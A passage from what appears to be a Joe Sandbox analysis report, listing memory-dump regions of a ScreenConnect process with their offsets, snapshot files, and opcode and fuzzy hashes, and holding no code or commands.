                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f5b16f6d8a11425e429dba353da91cb60fffc5eddc464a4df1ff6a8c365d69cf
                                                                      • Instruction ID: f7981b7c6d0ab79db3383f9fc59988dc1ba4994b11b4c8d341de4f3f0f2f4712
                                                                      • Opcode Fuzzy Hash: f5b16f6d8a11425e429dba353da91cb60fffc5eddc464a4df1ff6a8c365d69cf
                                                                      • Instruction Fuzzy Hash: CC01B1B67401109FC708DA6AF4909AEB7EAFBC9261315853AEA09CB350CB32DC178754
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2956546852.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_104d000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                      • Instruction ID: 921e49af1c09d83f3363ac9b0c26f6e191153c06d574fe7e70adb3e457e7c403
                                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                      • Instruction Fuzzy Hash: 5411AFB6504280CFDB16CF54D9C4B16BFA2FB98324F24C6A9D9490B256C336D45ACBA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d9ce1884a09c036afb3e5ddb80c45292670d452d28433691b20e51e71e9ce5f9
                                                                      • Instruction ID: 6468aaaec96ee3974091c042a4efdf123ecc2833c98b84624de9e0d522b955d3
                                                                      • Opcode Fuzzy Hash: d9ce1884a09c036afb3e5ddb80c45292670d452d28433691b20e51e71e9ce5f9
                                                                      • Instruction Fuzzy Hash: 740126317041699FEB4A7FB8942417E3BA3FFC42147104528E506BB390DF39AE1297D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8809c2e54ed60a26434e10325b3dde7d7bc19342eb7577b1f42ed645bccb3f7c
                                                                      • Instruction ID: 64f3017b35a3e4075edc11f98854d0fca69062574810d9c29e10ce28eaa851e9
                                                                      • Opcode Fuzzy Hash: 8809c2e54ed60a26434e10325b3dde7d7bc19342eb7577b1f42ed645bccb3f7c
                                                                      • Instruction Fuzzy Hash: A0215E74E0020A9FDB04EBA5D5989AEBBB1EF88304B108564D915BB354DB70ED85CB51
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ec3582317195cd2bff2017027613a9af27900f087147fb0ec0b653a68159dc33
                                                                      • Instruction ID: be1b3f6d6c8f92a1e60ed8ae376a875cf8d3a516a01b7487d87278e2f3dbef41
                                                                      • Opcode Fuzzy Hash: ec3582317195cd2bff2017027613a9af27900f087147fb0ec0b653a68159dc33
                                                                      • Instruction Fuzzy Hash: 9D014535B002014FDB189B7C959096DB7E6DFC5244701817EE449E7369EF34EC1683C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f26de7689006f247121f63855311f08dd4a5bbc3434bd84c047688380fdf271
                                                                      • Instruction ID: cded139571328a9ece013e51d0b2e68b8eacc348314e306056e745befaa90c9e
                                                                      • Opcode Fuzzy Hash: 6f26de7689006f247121f63855311f08dd4a5bbc3434bd84c047688380fdf271
                                                                      • Instruction Fuzzy Hash: 98019E353006128FC760DF6AD49492AB7E6EF8C2243544469E94AAB365DF31FD12CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 36f2b0722584d6afbe9f5e0e12d725b31e264d8a9eebf9e5aa47b66d88e544d3
                                                                      • Instruction ID: 092224599a8f9cf7a1e5edede4f2b28be7fc22259f5330871c821b1d7220a213
                                                                      • Opcode Fuzzy Hash: 36f2b0722584d6afbe9f5e0e12d725b31e264d8a9eebf9e5aa47b66d88e544d3
                                                                      • Instruction Fuzzy Hash: 9701B1B13006011BE315A76996F45AFABD3EBC0254310DA38E16AAF395DF71EC0A8790
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5749e6958c083c7472435ebce2a67bb519bbbb7f7fbe9c69bfa8242d694a20fc
                                                                      • Instruction ID: c757d1129cba76b3924d9b3c5337fa8d66b07377b50db6b8550602866ff7c16b
                                                                      • Opcode Fuzzy Hash: 5749e6958c083c7472435ebce2a67bb519bbbb7f7fbe9c69bfa8242d694a20fc
                                                                      • Instruction Fuzzy Hash: 2101D4B13002011BE315A66995F496FBAD3EBC0254750DA38E15AAF395DF71FC054790
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2956546852.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_104d000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 772f8d3c864dc2e87b241902efd51d0e131e0d7603e9982bf996e69d4907c694
                                                                      • Instruction ID: 9b7e86cb1d40e27f212f326b01989e5a1d2510c207b17bafafc9237555ca9609
                                                                      • Opcode Fuzzy Hash: 772f8d3c864dc2e87b241902efd51d0e131e0d7603e9982bf996e69d4907c694
                                                                      • Instruction Fuzzy Hash: E80169A140D3809FE7134A258894752BFA8EF53224F0984DBE9888F2A3C2695845C772
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2956546852.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_104d000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 12b12205acd535776edc1cbc2d2c8217f104092cb7fbc6f5ff0ad387092fe122
                                                                      • Instruction ID: da5cfab51ef5711bb63fee568a50af82e8c2e6c2dbb76bf150ccbace7581a9fd
                                                                      • Opcode Fuzzy Hash: 12b12205acd535776edc1cbc2d2c8217f104092cb7fbc6f5ff0ad387092fe122
                                                                      • Instruction Fuzzy Hash: 050126B11083009BE7118A69CDC4B6BBFD8EF513A4F08C57AFD894B286C279D842C7B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 792bfe02a5a9f073f8b6163b1512adb031efba4d932568efe2c83d60b1dd6810
                                                                      • Instruction ID: 426a569dc2d897ec3cfd2e1077984ca02bd77d36c926bb00a9c167a733e918f2
                                                                      • Opcode Fuzzy Hash: 792bfe02a5a9f073f8b6163b1512adb031efba4d932568efe2c83d60b1dd6810
                                                                      • Instruction Fuzzy Hash: 24014EB1B483006FD315972AE854A5ABFE5DB81250B05457BD649DB350DF74EC0A87D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 00c2df74277a434eee67bd31124b17c5075f72bf476bc612cfbca2ff84ce2808
                                                                      • Instruction ID: 38887b4ee678518e0f77e35b2a8e3c8f456f9f79778203893b5af9b75e7b7503
                                                                      • Opcode Fuzzy Hash: 00c2df74277a434eee67bd31124b17c5075f72bf476bc612cfbca2ff84ce2808
                                                                      • Instruction Fuzzy Hash: 14016276B0010A9FCF14DBA9D8009EEBBB5EF94265B00847BD959E3204E630A9258B91
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7b0a4d93249bea9a0af5947b2c6be4070c6919350a5671a976c1d97344ca7b3
                                                                      • Instruction ID: fd4f223852c504546bee81bca5dad68ae9f0cc2c9e440b1cfc42a53372be1429
                                                                      • Opcode Fuzzy Hash: a7b0a4d93249bea9a0af5947b2c6be4070c6919350a5671a976c1d97344ca7b3
                                                                      • Instruction Fuzzy Hash: 91F0F6B6B043004FD319DB39E86009DBBA6EE91254309C5BAD009DF366EE31D8068B90
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f9a183bb07f7058d2b3babe7bacfe6e28a446b6e2eb58410c2188a8a4568fd2c
                                                                      • Instruction ID: 3acf2e2846756f341ca2b0aae0f6e0ee7a648227ffde85483a9aa3fa8038ba3c
                                                                      • Opcode Fuzzy Hash: f9a183bb07f7058d2b3babe7bacfe6e28a446b6e2eb58410c2188a8a4568fd2c
                                                                      • Instruction Fuzzy Hash: 27F0B432700219AFEF059F94A8409EE3B7BFB88214B008029F619E7250DA72992297A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5e33415e3d31a75a8f75b89b1c8c2d3728895a6e260cc5055555cafccba7dba0
                                                                      • Instruction ID: 5bc9532acfd79523aaa0a63736ea7653563503824ec3bfb6fcadfa1742367494
                                                                      • Opcode Fuzzy Hash: 5e33415e3d31a75a8f75b89b1c8c2d3728895a6e260cc5055555cafccba7dba0
                                                                      • Instruction Fuzzy Hash: 430162B1D00219DFCB44DFA9C8405DEFBF0EF46210B108665D528EB250E331AA13DF80
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fea94b1ffa5705ff368a99e91f4352a3b3b2b92228840924060cb77d3bb8bc40
                                                                      • Instruction ID: ab65217f42d3cb12e45dbd52cc1b56c63f64f828ab19673aa211b6f81bb4b47b
                                                                      • Opcode Fuzzy Hash: fea94b1ffa5705ff368a99e91f4352a3b3b2b92228840924060cb77d3bb8bc40
                                                                      • Instruction Fuzzy Hash: 54F0C23084834BAFDF01AF64D4157AABFB0EB41301F104C65C501AB256DB78556ACB82
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8ceefe715259739fcdb9e9cc14b22a6cf2df6269898e1f6be51e5b43133cd866
                                                                      • Instruction ID: 739dec3da870078969b51a1bf8ca99ac2476cd2a6c71b61559209fe812994fc3
                                                                      • Opcode Fuzzy Hash: 8ceefe715259739fcdb9e9cc14b22a6cf2df6269898e1f6be51e5b43133cd866
                                                                      • Instruction Fuzzy Hash: 12F0597B6042185F8344DE5AD40085EBFA6DFC5220708C057F818E7311D539E912C760
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7ead50bdeee3dd87ed9d10aa516ba2c8f631dc180bb0589c1845e3bf9f8c6122
                                                                      • Instruction ID: cdad7d7200c6fc49a997fac650d0ba1771cbf379549217ab029d88b85cbea515
                                                                      • Opcode Fuzzy Hash: 7ead50bdeee3dd87ed9d10aa516ba2c8f631dc180bb0589c1845e3bf9f8c6122
                                                                      • Instruction Fuzzy Hash: 29F0B4707403015BA2109A5BE85095BB7CADB845503008539E5499B304DE70F81547D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eb8377306a2edd7ea259f28527ef00d6983d1984eeee4f22cfd901bb2b48686e
                                                                      • Instruction ID: eb6edebbccb0743bf24cbd76944631bc06d19bae42733b667507f6e2e5608b81
                                                                      • Opcode Fuzzy Hash: eb8377306a2edd7ea259f28527ef00d6983d1984eeee4f22cfd901bb2b48686e
                                                                      • Instruction Fuzzy Hash: 76F0E26038A6804FDB05D738C85088E3FB2DE8725438A44BAC18ECB2A3E9188C0B8751
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 59c84bbd4ea4d29608e65014614efe584bb71e176f73a1a54aafd44362e8afc8
                                                                      • Instruction ID: 30047b8bd737e5ada96d46a1edd58cab132e4519189f93929e3007ee3b5b10e0
                                                                      • Opcode Fuzzy Hash: 59c84bbd4ea4d29608e65014614efe584bb71e176f73a1a54aafd44362e8afc8
                                                                      • Instruction Fuzzy Hash: 4DF06D70D8420ADFDF00DF69E918B6EBBF4FB44315F004865D600A7254DB78A5699B82
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8eeb5c29714b1dc56298fdacfb72064ba18cf3a58b9e1b5942c06f6e9bc7432
                                                                      • Instruction ID: cf03f8f6cbcb4fbb6a6e4eff84e5750d505fc98567b6c8f71bc0a71865672c25
                                                                      • Opcode Fuzzy Hash: d8eeb5c29714b1dc56298fdacfb72064ba18cf3a58b9e1b5942c06f6e9bc7432
                                                                      • Instruction Fuzzy Hash: 42F09A31700124CFC718DF29D404AAEB7E1EF88310B0480A4E805DB368EA34ED10CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c7c12ba2fadbabe89535e9bb86ebe7baceece9e975beaa57c6d302faa7311b68
                                                                      • Instruction ID: 16400a57e9c515218280c8df2ed09a4bc7c3008303b1bf9bd1d2fc302023934d
                                                                      • Opcode Fuzzy Hash: c7c12ba2fadbabe89535e9bb86ebe7baceece9e975beaa57c6d302faa7311b68
                                                                      • Instruction Fuzzy Hash: 8BE0A0367002186F47449A8AD400D6FBBEADBC8220718C016F908D7300D975E9128B60
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eb6450bb0643b64ae248b9b3a38d7821ea9acee0e0734bc38d4024034ade298a
                                                                      • Instruction ID: 9a5c0ecaf4e9a8ab6a1e1d6d21a5593040b7a762b366a958a76a7cceef037cb7
                                                                      • Opcode Fuzzy Hash: eb6450bb0643b64ae248b9b3a38d7821ea9acee0e0734bc38d4024034ade298a
                                                                      • Instruction Fuzzy Hash: A7E02272B142012FC318A629E8407ABB7A6DBDA764F54487EC30CCB256CD768C47C660
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aab5a3b7751f861cbbbac533cfb157c99feb1cfe11c0e3abb4e1015747401bdc
                                                                      • Instruction ID: 7c3cf9d0b4ff6bc20f47cbcd49b5bddaf49767570a7db81dc664e779515b5875
                                                                      • Opcode Fuzzy Hash: aab5a3b7751f861cbbbac533cfb157c99feb1cfe11c0e3abb4e1015747401bdc
                                                                      • Instruction Fuzzy Hash: C4F08230D493448FC791DF788C1049DBFF0EF0924071544EBD888DB262E2309E16CB92
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 11464bb25d750d5dc295ee10ab7d23ea60f94436f3bc061a1fa378d405337c23
                                                                      • Instruction ID: 162ae2146500ad2a4fef57d322d46830aaf2783baa0be10e137620726ac1b9d2
                                                                      • Opcode Fuzzy Hash: 11464bb25d750d5dc295ee10ab7d23ea60f94436f3bc061a1fa378d405337c23
                                                                      • Instruction Fuzzy Hash: 92F0D471E00219DF8B40DFADC84069EFBF5EF89200B64C06AD918E7211E331AA12CFC0
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 441ec72ec2ee6ed5fad34a8cd07579107df389e65406f1385f13485fb2ea98ad
                                                                      • Instruction ID: 2cbcff7bcce120df31905e29a700d38bc634a3d2f99e005c39740422eb484c34
                                                                      • Opcode Fuzzy Hash: 441ec72ec2ee6ed5fad34a8cd07579107df389e65406f1385f13485fb2ea98ad
                                                                      • Instruction Fuzzy Hash: BAE06DB5D002199FCB40DFA9C8410DEFBF4EB08200B548469C928EB201F33197039FD0
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d85d51b50a1a689381c99da446086a419e4217f811f76b6b1eacb08df60b1939
                                                                      • Instruction ID: 8a7310342899ae216c1ce5721d590e1b036e153cca8681987b384ea9ce70ba66
                                                                      • Opcode Fuzzy Hash: d85d51b50a1a689381c99da446086a419e4217f811f76b6b1eacb08df60b1939
                                                                      • Instruction Fuzzy Hash: 7AE02676300260AFF304CB69DD42C657BE5EF4A31870980E6EA08DF363C5A0FC028B90
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2cca360d4c51d6b87d6c81745e14d5671806accec89f674cd6d746764bb29d47
                                                                      • Instruction ID: 776fe11a36647ab1ca56017f55299548690240d95c0c0a1097fb54469f5ed485
                                                                      • Opcode Fuzzy Hash: 2cca360d4c51d6b87d6c81745e14d5671806accec89f674cd6d746764bb29d47
                                                                      • Instruction Fuzzy Hash: 70E026327012011BC314952EE840997B3AADBC9264B10087DD20CC7311CD329C4782A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80981407468e17a4483ab9eca166ea23067c60c675b91fafa6697760d1795366
                                                                      • Instruction ID: adcafefcf5d7c6a40813838a13d7bf9b999b1e2ddc6813935877f5e4bb6aa539
                                                                      • Opcode Fuzzy Hash: 80981407468e17a4483ab9eca166ea23067c60c675b91fafa6697760d1795366
                                                                      • Instruction Fuzzy Hash: 7AE09231340300CFC3149B59C644D56BBE6EFC5714F1584A9E5099B3A1CB72FC42CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0f59840c72100152796d209b0095cbba9a21da25207aa5eb3520d75fcea363b9
                                                                      • Instruction ID: 50dfdf12176ba4d5ec62a9c46d6c02086e77fbbee01d6d747f98dcf659b3ba6d
                                                                      • Opcode Fuzzy Hash: 0f59840c72100152796d209b0095cbba9a21da25207aa5eb3520d75fcea363b9
                                                                      • Instruction Fuzzy Hash: F7E06D36340300CFD3188B18D244A95BBE3EF84725B1984A9D5499F3A2CB72EC42CB40
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                      • Instruction ID: 310390552ab4cd6d4c79a557c6d641c9d52e2af706b2852e61f0c51e86d971ba
                                                                      • Opcode Fuzzy Hash: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                      • Instruction Fuzzy Hash: 82E0B671E002299F8B80EFADD9015AEFBF4EF48210B50846AD91CE7201E3329B128FC1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7743f535faad5e7135d7584dfb1e93cd0f3e8d57c0f3216f4ba0721a625bc27b
                                                                      • Instruction ID: 09e57c1cfd600e284317960edd2bc3f1e758f3eb32bc4714fe5ae611d6348187
                                                                      • Opcode Fuzzy Hash: 7743f535faad5e7135d7584dfb1e93cd0f3e8d57c0f3216f4ba0721a625bc27b
                                                                      • Instruction Fuzzy Hash: C2E0C270E0020AFFAB00EFB5D9404CDBBF6EB41208B0042B9E809E3201EA31AE05A751
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5b378a56674e1c30224cd3ce776d84ac7a602518adca417aed84f2629375efc3
                                                                      • Instruction ID: 452d291a4602cad5466366d860948a710ddef39eaf799ec3f8428653d41d0457
                                                                      • Opcode Fuzzy Hash: 5b378a56674e1c30224cd3ce776d84ac7a602518adca417aed84f2629375efc3
                                                                      • Instruction Fuzzy Hash: 9DE08C3AB40004CFCB10DA59D4405A973F5EB8C215F1440E5D516E7220D235EC219B00
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5873f1852f9424dc88ad2b8f90134495331980dc0abbf216c4623135ffd01fb5
                                                                      • Instruction ID: 8dd8bafc1d6ca4800012ff46dc6847b7bc19efeb502942078c7525de1b359d2e
                                                                      • Opcode Fuzzy Hash: 5873f1852f9424dc88ad2b8f90134495331980dc0abbf216c4623135ffd01fb5
                                                                      • Instruction Fuzzy Hash: 2AD05E343601144FC744E738D44486E33DAAF889643518474D50DCB321EE21EC0147D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0e3869b95b8131629828107db10feb66ddcbb9d5d96999ceacf5d87d982ca36c
